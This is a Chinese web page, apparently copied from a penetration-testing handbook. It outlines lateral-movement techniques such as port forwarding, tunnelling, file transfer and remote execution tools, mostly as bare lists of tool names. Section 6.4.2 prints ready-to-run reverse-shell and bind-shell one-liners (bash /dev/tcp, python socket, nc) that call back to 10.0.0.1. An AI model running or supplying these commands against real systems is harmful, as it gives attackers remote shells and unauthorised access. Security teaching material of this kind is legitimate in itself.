- 目录
- 1. 序章
- 2. 计算机网络与协议
- 3. 信息收集
- 4. 常见漏洞攻防
- 5. 语言与框架
- 6. 内网渗透
- 7. 云安全
- 8. 防御技术
- 9. 认证机制
- 10. 工具与资源
- 11. 手册速查
- 12. 其他
文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
6.4. 综合技巧
6.4. 综合技巧
6.4.1. 端口转发
- windows
- lcx
- netsh
- linux
- portmap
- iptables
- socket代理
- Win: xsocks
- Linux: proxychains
- 基于http的转发与socket代理(低权限下的渗透)
- 端口转发: tunna
- socks代理: reGeorg
- ssh通道
- 端口转发
- socks
6.4.2. 获取shell
- 常规shell反弹
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
- 突破防火墙的imcp_shell反弹
- 正向shell
nc -e /bin/sh -lp 1234 nc.exe -e cmd.exe -lp 1234
6.4.3. 内网文件传输
- windows下文件传输
- powershell
- vbs脚本文件
- bitsadmin
- 文件共享
- 使用telnet接收数据
- hta
- linux下文件传输
- python
- wget
- tar + ssh
- 利用dns传输数据
- 文件编译
- powershell将exe转为txt,再txt转为exe
6.4.4. 远程连接 && 执行程序
- at&schtasks
- psexec
- wmic
- wmiexec.vbs
- smbexec
- powershell remoting
- SC创建服务执行
- schtasks
- SMB+MOF || DLL Hijacks
- PTH + compmgmt.msc
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论